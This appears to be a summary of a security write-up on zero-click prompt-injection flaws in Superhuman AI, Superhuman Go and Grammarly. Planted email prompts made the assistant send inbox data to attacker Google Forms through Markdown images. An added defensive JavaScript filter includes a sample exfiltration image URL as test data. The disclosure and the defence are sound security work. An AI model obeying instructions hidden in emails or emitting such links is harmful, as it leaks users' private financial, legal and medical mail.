Superhuman AI Exfiltrates Emails


Security researchers discovered critical prompt injection vulnerabilities in Superhuman AI that allowed attackers to exfiltrate sensitive emails without user interaction. By embedding malicious prompts in emails, attackers could manipulate the AI to extract financial, legal, and medical data from users' inboxes and submit it to attacker-controlled Google Forms. The attack exploited Superhuman's Content Security Policy whitelist for Google Docs and used Markdown image rendering to trigger automatic data submission. Similar zero-click vulnerabilities were found in Superhuman Go and Grammarly. Superhuman responded quickly, disabling vulnerable features and deploying remediation patches within days of disclosure.
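One way to close the Markdown image channel described above, as an added example that is not from the original post or from Superhuman's code: strip images from the assistant's reply before rendering unless the URL sits under a static-asset prefix and carries no query string, since a host-level allowlist alone still lets an allowed host receive data. The function names, the `assets.example-mail.test` prefix and the sample reply are assumptions constructed for illustration.

```javascript
// Added example; all names and URLs below are hypothetical/constructed.
// Assumption: the assistant's reply is Markdown that the client renders to HTML.

// Static asset locations the client is willing to load images from (constructed).
const ALLOWED_IMAGE_PREFIXES = ["https://assets.example-mail.test/img/"];

// Inline Markdown image: ![alt](url "optional title")
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;

function isSafeImageUrl(raw, prefixes) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return false; // relative or malformed URL: refuse
  }
  if (url.protocol !== "https:") return false;
  if (url.username || url.password) return false;
  // A query string or fragment can carry inbox text out in the image request.
  if (url.search || url.hash) return false;
  // Compare the normalized href so "../" segments are resolved before matching.
  return prefixes.some((p) => url.href.startsWith(p));
}

// Returns the reply with unsafe images replaced by text, plus the blocked URLs
// so they can be logged for detection.
function neutralizeMarkdownImages(markdown, prefixes = ALLOWED_IMAGE_PREFIXES) {
  const blocked = [];
  const text = markdown.replace(MD_IMAGE, (match, alt, url) => {
    if (isSafeImageUrl(url, prefixes)) return match;
    blocked.push(url);
    return `[image removed: ${alt || "untitled"}]`;
  });
  return { text, blocked };
}

// Constructed sample reply: one legitimate image, one image on an allowed-by-CSP
// host with data in the query string, one path-traversal attempt.
const SAMPLE_REPLY = [
  "Here is your summary.",
  "![logo](https://assets.example-mail.test/img/logo.png)",
  "![status](https://docs.google.com/forms/CONSTRUCTED-PLACEHOLDER?f=inbox-summary-text)",
  "![t](https://assets.example-mail.test/img/../collect/p.png)",
].join("\n");
```

Logging the `blocked` list gives the security team a signal that an email in the inbox attempted to steer the assistant.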

9m read time. From promptarmor.com
Table of contents
The Email Exfiltration Attack Chain
Zero-click Data Exfiltration in Superhuman Go and Grammarly
Exploiting Superhuman Mail’s Web Search
Responsible Disclosure
